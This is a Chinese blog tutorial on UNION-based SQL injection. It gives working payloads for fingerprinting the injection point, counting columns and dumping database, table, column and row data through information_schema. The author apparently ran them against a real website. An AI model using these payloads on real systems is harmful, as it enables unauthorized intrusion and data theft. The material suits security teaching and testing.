Web渗透(二)——SQL注入之联合注入

已于 2023-12-11 22:03:05 修改
阅读量972 收藏 20
点赞数 26
分类专栏: web渗透 文章标签: 数据库 sql 网络安全 web安全
于 2023-12-10 17:59:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61562251/article/details/134910627
版权

本文需要一定的数据库基础,本文只是简单介绍了一下渗透的思路和payload,具体payload的sql语法,需要自己去看sql代码语言。因为渗透过程中,是真实网页,所以进行打码处理。

一、联合查询注入:

1、判断是什么类型的注入(数值型和字符型)

id=183 and 1=1

若网页照常显示,则该语句没有错误。若网页报错,代表此处可以进行sql注入,并且是字符型注入。字符型注入无非是由 ' 或 " 所包括起来的内容。

此时在 id 参数后再次添加相对应的符号,借助sql的注释符 # 或 --+,将本身后一位的符号进行注释,形成新的语句。如:id=183' and 1=1 #

2、判断有多少个字段(Order  by排序)

id=183 order by 27

借用order by 对字段内的值排列来猜有多少字段。当不存在该字段,则会报错。

报错,所以是26个字段

3、获取数据库名(database()、information_schema.schemata)

借助联合查询对网页的内容进行回显,先查看一下那些字段是显示在哪个位置上

id=1 union select 1,2,3,4,5,6,……,26

确认显示字段7、10、13、21

开始注入,获取数据库名

id=1 union select 1,2,3,4,5,6,database(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.schemata

4、获取表名(tables)

仅显示一个数据表名

id=1 union select 1,2,3,4,5,6,database(),8,9,table_name,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables where table_schema=’查到的库名‘

利用group_concat(),来显示全部的数据表名

id=1 union select 1,2,3,4,5,6,database(),8,9,group_concat(table_name),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables where table_schema=’数据库名‘

5、获取字段名

id=1 union select 1,2,3,4,5,6,database(),8,9,table_name,11,12,group_concat(column_name),14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.columns where table_name=’表名‘

6、获取数据

获取第一条数据

id=1 union select 1,2,3,4,5,6,concat(id,table_name,rec_id,updated_at,updater_type,updater_id,updater_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from 表名

id=1 union select mmm1,2,3,4,5,6,group_concat(id,table_name,rec_id,updated_at,updater_type,updater_id,updater_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from 表名

若只回写一条信息:

①使用limit对特定数据的回写

②使用group_concat()对特定列进行全部输出(concat与group_concat的区别是,前者将获取到的数据按元组进行形成新列拥有多条数据,而后者是直接形成一条数据)

舜华浮生
关注
  • 26
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB入门——SQL注入
HasntStartIsOver的博客
06-03 323
注入和绕过
sql注入联合查询注入
qq_50953689的博客
05-04 1518
判断数据显示点 (id一定要改为0或负数) id=0' union select 1,2,3 主要作用:测试数据库表中的有效column是哪几列
sql注入——联合查询
qq_52843411的博客
08-22 172
我们先要进行不断的尝试,找出这个服务器后台数据库的列数,我们可以通过在语句后面添加order by 排序语句从1进行不断尝试,order by 1是对第一列进行排序,如果到哪列突然报,那我们就可以知道这个数据库的字段数,即15列。我们就获取到了用户名和密码,但是他们连在一起,所以我们添加分割符来是他们分开,方便我们辨认可以添加0x3a此为:的16进制,也可以直接写’:'字符串。但是联合查询我们的1-15并没有出来,所以我们要对语句进行修改,我们要使前面的语句错误,才能是我们的1-15显现出来。
SQL联合查询注入学习
2301_80034711的博客
03-10 971
SQL是操作数据库数据的结构化查询语句,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。程序没有对用户输入数据的合法性进行验证和过滤,导致SQL查询语句被恶意拼接从而产生SQL注入。攻击者可以在事先定义好的查询语句的结尾上添加额外的SQL语句,从而对数据库服务器执行非授权的任意查询,获得相应的数据信息。4、分类:①GET注入注入点在URL中②POST注入注入点在POST提交的数据中③Head头注入注入点在请求头中①有回显注入(显错注入):执行语句后可以把具体内容反馈出来。
SQL注入利用学习-Union联合注入
最新发布
qq_61861243的博客
04-08 1276
SQL语句中查询数据时,使用select 相关语句与where 条件子句筛选符合条件的记录。如果该id=1 中的1 是用户可以控制输入的部分时,就有可能存在SQL注入漏洞。数据库提供联合查询,使得可以将两条SQL查询语句的结果进行连接。务必注意:两者的字段数必须一致。判断联合查询语句中的字段数时,可以使用order by num。当依次增大num时,如果出现错误,那么上 一条SQL查询语句的结果字段数就为num-1。
SQL注入之路之一:联合注入
weixin_62715196的博客
08-10 628
简单介绍union联合注入的原理、常用数据库名,以及一次简单的手工联合注入流程
Web应用手工渗透测试——用SQLMap进行SQL盲注测试
02-26
本文主要关注SQL注入,假设读者已经了解一般的SQL注入技术,在我之前的文章中有过介绍,即通过输入不同的参数,等待服务器的反应,之后通过不同的前缀和后缀(suffixandprefix)注入数据库。本文将更进一步,讨论SQL...
WEB渗透——新手入门之初级工具利用
01-16
【标题】:“WEB渗透——新手入门之初级工具利用” 【描述】:“WEB渗透—优惠券https://www.panpansq.com—新手入门之初级工具利用”这个描述提到了一个在线资源,可能是提供有关WEB渗透教程的网站,它可能提供了...
预防XSS攻击和SQL注入XssFilter
05-19
攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是...
瑞友天翼2024SQL注入漏洞poc
02-27
标题中的“瑞友天翼2024SQL注入漏洞poc”指的是瑞友天翼2024版本...总的来说,这个主题涉及到的是网络安全中的一个重要环节——SQL注入漏洞的检测和防范,以及如何利用POC脚本进行渗透测试,以提升Web应用的安全性。
MySQL联合注入之字符型注入
m0_50211409的博客
03-27 1723
关于字符型注入 首先我们都知道,在数据库中字符串都是被单引号与双引号包裹起来的。 我们分析一下字符型注入SQL语句 select*from admin where id='1' 这是字符型注入后的语句 我们在传参的时候 ...
SQL注入进阶:掌握联合查询注入和报错注入攻击技巧
weixin_43263566的博客
01-19 3287
SQL注入联合查询注入与报错注入
基于联合查询的POST注入
m0_64338211的博客
02-16 3198
1.访问SQLi-Labs网站 在攻击机 Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs 上的 SQLi-Labs 网站Less-11。访问的URL为: http://[靶机IP]/sqli-labs/Less-11/ 2.利用Burpsuite工具抓包 (1)启动Burpsuite (2)设置Burpsuite的代理服务端口 在Burpsuite 软件界面上选择选项卡"Proxy"->"Options",在 Proxy Listeners模
网络安全——基于联合查询的字符型GET注入
weixin_54055099的博客
09-08 599
SQL注入之基于联合查询的字符GET注入
SQL注入-03】union联合查询注入案例
m0_64378913的博客
04-25 3319
目录1 union联合查询注入概述1.1 简介1.2 适用条件1.3 注入步骤1.4 注入技巧2 union联合查询注入案例2.1 操作环境2.2 操作具体步骤2.2.1 判断是否存在注入点及注入的类型2.2.2 使用ORDER BY 查询回显列数。2.2.3 判断显示位置2.2.4 获取数据库名2.2.5 获取数据库中的所有表名2.2.6 获取数据库的对应表中的所有字段名2.2.7 获取字段中的数据3 总结 本博客内容仅供学习探讨,请勿滥用乱用 1 union联合查询注入概述 1.1 简介 union
SQL注入-联合查询注入
m0_53820621的博客
08-10 3519
SQL注入-联合查询注入
SQL注入学习之union联合查询注入
LTNSLALALA的博客
06-13 4295
文章主要是对SQL注入中基于union联合查询注入方式的实践记录。
SQL 注入-基于联合查询的字符型GET注入
xdjxi的博客
02-16 643
实验原理 字符型GET注入,其注入点存在于URL中的GET参数处; 攻击者可以通过构造恶意的GET输入参数,利用union select 命令进行注入,暴露数据库中存储的信息。 实验步骤 1 访问SQLI-Labs网站 http://(加靶机IP)/sqli-labs/Less-1/ 登录后,根据网页提示,定一个GET参数 http://(靶机ip)/sqli - labs / Less/?id=1 2 寻找注入点 用以下三条payload寻找注入点及判断注入点的类型; http:/
SQL注入联合查询注入
热门推荐
selecthch的博客
06-07 4万+
联合查询注入利用的前提前提条件:页面上有显示位什么是显示位?在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数 据展示在页面中,这个展示数据的位置就叫显示位联合注入的过程1、判断注入点2、判断是整型还是字符型3、判断查询列数4、判断显示位5、获取所有数据库名6、获取数据库(test)所有表名7、获取(数据库:test,表:admin)中所有字段名8、获取字段中的数据一、...
web渗透sql注入
03-24
Web渗透中的SQL注入是一种常见的攻击,它利用了Web应用程序对用户输入的不充分验证和过滤,导致恶意用户可以通过构造特定的SQL语句来执行非法的数据库操作。下面是对Web渗透SQL注入的介绍: 1. SQL注入的原理:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值